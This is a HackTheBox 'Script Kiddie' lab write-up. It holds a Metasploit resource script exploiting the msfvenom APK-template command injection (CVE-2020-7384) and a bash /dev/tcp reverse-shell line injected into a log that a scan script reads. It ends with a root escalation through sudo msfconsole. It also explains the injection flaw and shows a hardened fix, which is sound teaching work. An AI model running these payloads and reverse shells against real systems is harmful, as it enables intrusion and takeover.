CTF-Writeups/HackTheBox/Script_Kiddie.md
2021-03-03 02:20:52 +05:00

HackTheBox-Script Kiddie

NMAP

```
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-02 19:59 PKT
Stats: 0:00:17 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.63% done; ETC: 19:59 (0:00:00 remaining)
Nmap scan report for 10.10.10.226
Host is up (0.21s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
4444/tcp open  krb524?
| fingerprint-strings:
|   GetRequest, NULL:
|     eNrsvWmXIjmSKPo9fwVddXsCiqhgc3AnTmXNEOz7vmbncHwDHHwB31i66/32J/kq34DIqntn7pmbfboCl0wmk8lkMkkm089/S2mKnKI4MXW8qjtJ/MIJR0lWYyCFVGiOs79piWHt35Ji/z
rypLqRZMH+lkmRkdwvp4TC8iytOl8SfWDdL1XWkDyNOsoSzSpOHcrV+anuZJZkOHHrJ
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.45 seconds
```

PORT 5000 (HTTP)

The page on port 5000 is a small "hacker tools" front end. It lets you run an nmap scan against an IP you supply, but attempts to inject shell commands through that field do not work.

The same goes for the msfvenom and searchsploit forms.

The msfvenom form does generate payloads, but only for Windows and Android.

There were no hidden directories or files on the web server; this page is all the machine hosts. A little googling turned up a then-recent vulnerability in msfvenom's payload-generation process (CVE-2020-7384): when an attacker-supplied APK is given to msfvenom as a template, the distinguished name of the APK's signing certificate is spliced unsanitised into a shell command string for keytool, so a certificate with a crafted name executes commands on whatever host runs msfvenom. Metasploit ships an exploit module for it, exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection, and the Android form here accepts an APK template upload.

The exploit was new at the time, so Metasploit has to be updated for the module to be present. If the update fails with an error about the Gemfile, do the following, in this order:

```shell
gem update
cd /usr/share/metasploit-framework
sudo nano Gemfile.lock      # bump the reline version pinned in this file; do this before bundle install
sudo bundle install         # run from inside the metasploit-framework directory
```

Generate the malicious APK with that module, start a handler for the payload it embeds, and upload the APK as the template in the web app's msfvenom form with Android selected. The server runs msfvenom on it, the injected command fires, and a shell comes back as the kid user; stabilise it before going further.
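The foothold as one msfconsole resource script, added here as an example and not taken from the writeup. The module path is Metasploit's own; the listener port 4444, the cmd/unix/reverse_netcat payload and the resource-file name are assumptions, and 10.10.14.126 is the attacker address the writeup uses later.

```shell
#!/bin/sh
# Added example, not the writeup's: write a resource script that builds the
# malicious APK template with Metasploit's CVE-2020-7384 module and starts the
# matching handler, then run it with msfconsole if one is on PATH.
# Assumptions: attacker address/port and the payload choice are ours, not the page's.
LHOST="${LHOST:-10.10.14.126}"
LPORT="${LPORT:-4444}"

# write_rc OUTFILE: emit the resource script. The fileformat module drops its
# APK under ~/.msf4/local/ (default name msf.apk); that file is what gets
# uploaded as the "template" in the web app's msfvenom form with Android selected.
write_rc() {
  cat > "$1" <<EOF
use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
set PAYLOAD cmd/unix/reverse_netcat
set LHOST $LHOST
set LPORT $LPORT
run
use exploit/multi/handler
set PAYLOAD cmd/unix/reverse_netcat
set LHOST $LHOST
set LPORT $LPORT
run -j
EOF
}

rc="${RC:-foothold.rc}"
write_rc "$rc"
if command -v msfconsole >/dev/null 2>&1; then
  msfconsole -q -r "$rc"
else
  echo "msfconsole not on PATH; resource script written to $rc" >&2
fi
```

Run it once, upload the APK it produced, and the handler catches the callback from the web server when msfvenom processes the template.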

In pwn's home directory there is a bash script, scanlosers.sh, that reads the `hackers` log file from kid's home directory, pulls an IP out of each line and runs nmap against it.

That log file is group-owned by pwn and writable by kid, so kid controls what the script reads.

Because each line is spliced into a shell command string, a line that starts with a command separator and ends with a comment character becomes a command of its own. Append a bash reverse shell this way; the two leading spaces are required, because the script throws away the first two space-separated fields of every line (the timestamp in a genuine entry) before using the rest:

```shell
echo "  ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.126/1337 0>&1' #" >> hackers
```

With a listener on 10.10.14.126:1337, the callback arrives as pwn.
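Why the payload line has to look like that, as an added shell example that is not the box's script. The functions below reconstruct the pattern rather than copying scanlosers.sh: they assume the script cuts each `hackers` line down to field three onwards and hands the remainder to `sh -c` inside an nmap command line, which is the general shape of any script that splices file contents into a shell string. nmap is swapped for echo so it runs anywhere, and the reverse shell is replaced by a harmless `touch`, so the only thing the injected line does is create a marker file. The hardened variant shows the fix: validate the field as a dotted-quad and pass it as an argument instead of building a command string.

```shell
#!/bin/sh
# Added example, not the box's scanlosers.sh. Models the vulnerable pattern:
# lines from an attacker-writable log are cut down to "field 3 onwards" (a
# genuine entry looks like "[date time] ip") and spliced into a string run by
# sh -c. The real script runs nmap; echo stands in for it here.

# Vulnerable: $ip is interpolated into a command *string*, so a ';' ends the
# intended command and a trailing '#' swallows whatever the script appends.
scan_vulnerable() {   # $1 = log file
  cut -d' ' -f3- "$1" | sort -u | while read -r ip; do
    sh -c "echo scanning ${ip} 2>&1 >/dev/null"
  done
}

# Hardened: accept only a dotted-quad and hand it to the tool as a single argv
# element, so no shell re-parses attacker text. (With nmap: nmap --top-ports 10 "$ip".)
scan_hardened() {     # $1 = log file
  cut -d' ' -f3- "$1" | sort -u | while read -r ip; do
    case "$ip" in
      *[!0-9.]*|'') printf 'rejected: %s\n' "$ip" >&2; continue ;;
    esac
    echo "scanning $ip"
  done
}

# make_log FILE MARKER: constructed sample input. A real entry, then the same
# injection with two leading spaces (fields 1 and 2 are empty, the payload
# survives the cut) and with one leading space (the ';' lands in field 2 and
# is thrown away, so nothing fires).
make_log() {
  printf '[2021-03-02 20:00:01] 10.10.14.126\n' > "$1"
  printf '  ;touch %s.two #\n' "$2" >> "$1"
  printf ' ;touch %s.one #\n' "$2" >> "$1"
}

# Run with "demo" as the first argument to see which marker appears.
if [ "${1:-}" = "demo" ]; then
  log="$(mktemp)"; marker="$(mktemp -u)"
  make_log "$log" "$marker"
  scan_vulnerable "$log"
  ls "$marker".* 2>/dev/null     # only the .two marker exists
  rm -f "$log" "$marker".*
fi
```

The same reasoning applies to the msfvenom bug from the foothold: there the attacker-controlled text is a certificate name rather than a log field, but it also ends up inside a command string that a shell re-parses.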

`sudo -l` as pwn shows that msfconsole may be run as root.

Run `sudo msfconsole`. Anything typed at the msf prompt that is not a Metasploit command is passed to the system shell, so every such command now runs as root; typing `bash` at the prompt gives a root shell.